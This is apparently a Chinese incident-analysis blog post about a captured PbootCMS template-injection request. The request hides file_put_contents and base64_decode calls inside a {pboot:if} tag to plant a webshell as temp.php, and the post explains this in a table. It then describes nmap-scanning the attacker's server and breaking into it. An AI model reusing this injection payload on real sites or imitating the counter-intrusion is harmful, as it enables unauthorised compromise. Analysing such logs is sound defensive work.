PbootCMS 模板注入{pboot:if}是PbootCMS的条件判断标签,攻击者利用模板引擎漏洞执行任意PHP代码可能某个黑客路过尝试一下
GET /{pboot:if((\"file_put_co\".\"ntents\")(\"temp.php\",(\"base6\".\"4_decode\")(\"删掉了")))}{/pboot:if}/../../?p=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Referer: http://n.....com告警分析
| 关键字段 | 内容分析 | 攻击风险评估 |
|---|---|---|
| 请求路径 | /{pboot:if((\"file_put_co\".\"ntents\")(\"temp.php\",...))}{/pboot:if}/../../?p=1 | 包含PbootCMS模板标签{pboot:if},内嵌 PHP 代码执行文件操作 |
| 执行动作 | file_put_contents("temp.php", base64_decode("...")) | 将 Base64 解码后的恶意代码写入 temp.php 文件(Webshell 植入) |
| Base64 解码内容 | 创建并执行远程 PHP 文件,最终删除自身(典型 Webshell 行为) | |
| 请求频率 | 5 分钟内 18 次请求 | 可能在尝试绕过防护机制或验证漏洞利用效果 |
| 来源特征 | User-Agent为正常浏览器,但Referer指向片片网站 | 利用片片网站作为攻击跳板,隐藏真实来源 |
群里讨论
提交沙箱
删掉的地址指向一个txt,有人提交过了
看看txt的内容,没有什么有用的东西
黑客的服务器就开了两个端口
算了,看看Referer发现指向难以描述的网站
前往下载APP的地址
指向江苏住宅IP
是江苏的精神小伙吗
nmap扫了一下发现开放端口88和8888和几个常用端口
访问端口88首页看见是Wordpress初始页面
一顿疯狂尝试
shell地址:
很高兴认识你
2班3组徐XX
© 版权声明
THE END
暂无评论内容